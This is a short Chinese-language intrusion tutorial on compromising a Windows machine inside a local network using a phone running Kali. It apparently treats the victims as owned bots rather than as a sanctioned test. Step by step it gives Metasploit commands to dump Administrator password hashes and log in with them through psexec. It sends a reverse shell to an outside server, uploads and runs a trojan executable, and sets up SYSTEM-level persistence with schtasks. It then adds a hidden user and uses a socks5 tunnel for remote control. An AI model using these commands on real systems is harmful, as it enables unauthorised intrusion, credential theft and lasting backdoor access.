使用内网穿透，或代理，访问内部局域网环境，实现外网访问内网

该文章完全利用手机进行渗透，无须电脑进行渗透 + 一台Windows Serve服务器用于管控

ps：手机kali+手机RDP登陆+手机全局socks5代理

手机kali看之前文章

ps：加一台Windows Server服务器用于管控

内网肉鸡

hash提取

Windows密码的哈希值
在MSF反弹过来得shell上提取hash
用msf自带 hash提取模块

run post/windows/gather/smart_hashdump

如图已提取出Administrator用户hash值

登陆hash

use exploit/windows/smb/psexec

使用SMB登陆模块

set SMBUser Administrator

设置用户名

set SMBPass xxxx

设置用户hash值

set lport 5000

设置反弹端口号

set lhost 8.8.8.8

设置反弹过去得shell到IP

大致思路用hash登陆内网一台电脑
反弹一个shell权限到外网服务器 8.8.8.8
上传植入后门木马
计划任务System权限维持

上传文件

upload /root/xs.exe

进入主机shell

shell

进入肉机D盘

木马上传到了D盘，cd进入D盘，执行.exe木马

cd D:\xs
D:
.\xs.exe

肉鸡上线

进入肉鸡shell权限，添加一个System开机持久化权限

1：创建开机运行exe
任务名称xs，以System用户启动

schtasks.exe /create /tn "xs" /ru SYSTEM /sc ONSTART /tr "D:\xs\xs.exe"

2：查询任务
任务名称xs

schtasks /query /tn "xs"

3：运行xs任务

schtasks /run /tn "xs"

4：删除xs任务

schtasks /delete /tn "xs"

这里可以用肉鸡功能 开机3389 桌面登陆

看你远控有没有 功能这么强大了

添加一个隐藏用户
然后内网Socks5内网穿透

使用Socks5代理登陆到内网机器

一台手机渗透，并进行管控

安卓socks5代理软件：Proxy Droid

安卓远程桌面登陆：RD Client
谷歌商店均可下载